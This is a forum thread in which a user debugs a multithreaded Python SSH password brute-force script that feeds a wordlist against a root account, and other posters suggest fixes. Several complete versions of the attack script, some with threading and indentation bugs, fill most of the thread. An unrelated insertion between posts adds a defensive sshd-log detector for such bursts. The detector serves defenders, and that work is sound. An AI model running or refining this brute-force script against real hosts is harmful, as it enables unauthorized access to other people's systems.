SSH Brute Force script
SSH Brute Force script #1
Hi;

So I've made the script and it runs with no errors but doesn't give the output I was hoping it would. The code is as follows:

Code:
import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read-nonblocking' in str(e):
            Fails +=1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
    parser = optparse.OptionParser('usage%prog '+\
    '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string',\
    help='Specify target host')
    parser.add_option('-F', dest='passwdFile', type='string',\
    help='Specify password file')
    parser.add_option('-u', dest='user', type='string',\
    help='Specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user
    if host == None or passwdFile == None or user == None:
        print parser.usage
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fn.readlines():
        if Found:
            print "[*] Exiting: Password found"
            exit(0)
    connection_lock.acquire()
    password = line.strip('\r').strip('\n')
    print "[-] testing: "+str(password)
    t = Thread(target=connect, args=(host, user, password, True))
    child = t.start()
if __name__ == '__main__':
    main()

When I run it I get the following output:

python sshCommand2.py -H 10.10.1.36 -u root -F dictionary.txt
[-] testing: zhongguo

zhongguo being the last password in the file, so it looks like it is starting with that password and not at the first. The output I was expecting to get would be something like this:

python sshCommand2.py -H 10.10.1.36 -u root -F dictionary.txt
[-] testing: 123456
[-] testing: 12345
[-] testing: 1234
[-] testing: 123
[+] Password Found: Alpine
[-] testing: 1234
[-] testing: 123
[*] Exiting: Password Found

Any idea what I've done wrong here? Any help would be much appreciated. Cheers

Reply
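
The defender's view of the script in the post above, as an added example that is not part of any post in this thread: a Python 3 detector for what such a run leaves in the target's sshd log, namely a burst of password failures for one account from one source, followed (if a guess lands) by an accepted login. The log lines are constructed in OpenSSH's syslog format; the `detect` function, its threshold, window and default year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in OpenSSH syslog format; hosts, ports and times are made up.
SAMPLE_LOG = """\
Oct 14 08:50:01 srv sshd[2101]: Failed password for root from 192.0.2.10 port 40110 ssh2
Oct 14 08:50:01 srv sshd[2102]: Failed password for root from 192.0.2.10 port 40112 ssh2
Oct 14 08:50:02 srv sshd[2103]: Failed password for root from 192.0.2.10 port 40114 ssh2
Oct 14 08:50:02 srv sshd[2104]: Failed password for root from 192.0.2.10 port 40116 ssh2
Oct 14 08:50:03 srv sshd[2105]: Failed password for root from 192.0.2.10 port 40118 ssh2
Oct 14 08:50:06 srv sshd[2106]: Failed password for root from 192.0.2.10 port 40120 ssh2
Oct 14 08:50:09 srv sshd[2107]: Accepted password for root from 192.0.2.10 port 40122 ssh2
Oct 14 08:51:00 srv sshd[2110]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Oct 14 08:51:10 srv sshd[2111]: Accepted password for alice from 198.51.100.7 port 51002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")

def detect(log_text, threshold=5, window=timedelta(seconds=60), year=2013):
    """Return alerts as (kind, ip, user, failures_in_window) tuples."""
    recent = defaultdict(deque)  # (ip, user) -> timestamps of recent failures
    flagged = set()              # keys that already raised a burst alert
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so one is assumed.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        q = recent[key]
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold and key not in flagged:
                flagged.add(key)
                alerts.append(("burst", *key, len(q)))
        elif key in flagged and q:
            # A success right after a burst is the high-priority case.
            alerts.append(("login_after_burst", *key, len(q)))
    return alerts
```

On the sample, the single mistyped password for `alice` raises nothing, while the `root` burst and the login that follows it are both reported.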

RE: SSH Brute Force script #2
What comes after zhongguo?
The next to last password or the first one?


Reply

RE: SSH Brute Force script #3
zhongguo is the very last password in the list, so there wouldn't be any more unless you were to go back from the start again, in which case the next ones would be:

12345
abc123
password
computer
123456
tigger

Reply

RE: SSH Brute Force script #4
So the program reads the last password (zhongguo) and then starts reading the passwords normally from top to bottom? I'm really not sure what the problem is here, but you could try a different way of reading the file:

The readlines() function loads the entire file into memory as it runs. A better approach for large files is to use the fileinput module, as follows:
Code:
import fileinput

for line in fileinput.input(['myfile']):
    do_something(line)
The fileinput.input() call reads lines sequentially, but doesn't keep them in memory after they've been read, or even simply do this, since a file in Python is iterable.


Reply

RE: SSH Brute Force script #5
I tried that and it now goes through all the passwords but doesn't find the password that it should; it just prints all the passwords out sequentially but doesn't find the password:

Code:
import pxssh
import optparse
import time
import fileinput
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read-nonblocking' in str(e):
            Fails +=1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
    parser = optparse.OptionParser('usage%prog '+\
    '-H <target host> -u <user> -F <password list>')
    parser.add_option('-H', dest='tgtHost', type='string',\
    help='Specify target host')
    parser.add_option('-F', dest='passwdFile', type='string',\
    help='Specify password file')
    parser.add_option('-u', dest='user', type='string',\
    help='Specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user
    if host == None or passwdFile == None or user == None:
        print parser.usage
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fileinput.input(['dictionary.txt']):
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print "[-] testing: "+str(password)
        if Found:
            print "[*] Exiting: Password found"
            exit(0)
            if Fails > 5:
                print "[!] Exiting: Too Many Socket Timeouts"
                exit(0)
        connection_lock.acquire()
        print "[-] testing: "+str(password)
        t = Thread(target=connect, args=(host, user, password, True))
        child = t.start()
if __name__ == '__main__':
    main()
(This post was last modified: 10-14-2013, 08:54 AM by Justone.)

Reply

RE: SSH Brute Force script #6
@theRandy
Did you do it correctly?
If I've understood it correctly, it does the same as readlines().


Reply

RE: SSH Brute Force script #7
(10-14-2013, 08:57 AM)Slarek Wrote: @theRandy
Did you do it correctly?
If I've understood it correctly, it does the same as readlines().

I'm fairly sure I've done it right. I cut it down a little bit more now to get rid of the option for the input of the password file when running. It seems to run, show 4 passwords with [-] testing (1 of these being the correct password) and then freeze; it doesn't go any further and doesn't stop running. Cut-down code:

Code:
import pxssh
import optparse
import time
import fileinput
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print '[+] Password Found: ' + password
        Found = True
    except Exception, e:
        if 'read-nonblocking' in str(e):
            Fails +=1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release: connection_lock.release()
def main():
    parser = optparse.OptionParser('usage%prog '+\
    '-H <target host> -u <user>')
    parser.add_option('-H', dest='tgtHost', type='string',\
    help='Specify target host')
    parser.add_option('-u', dest='user', type='string',\
    help='Specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    user = options.user
    if host == None or user == None:
        print parser.usage
        exit(0)
    for line in fileinput.input(['dictionary.txt']):
        connection_lock.acquire()
        if Found:
            print "[*] Exiting: Password found"
            exit(0)
            if Fails > 5:
                print "[!] Exiting: Too Many Socket Timeouts"
                exit(0)
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print "[-] testing: "+str(password)
        t = Thread(target=connect, args=(host, user, password, True))
        child = t.start()
if __name__ == '__main__':
    main()

Reply

RE: SSH Brute Force script #8
So after it has found the right password, it freezes? Or after the 4th password?
Does this script read the password correctly from the top to the bottom?


Reply

RE: SSH Brute Force script #9
With the second piece of code I posted it reads from the top to the bottom but just doesn't find the password. The third (the one I tried to snip) goes in order but stops at the fourth password and doesn't go any further.

Reply

RE: SSH Brute Force script #10
Is the 4th the correct password? Try to change the correct password and we'll see if it stops again at the 4th.


Reply
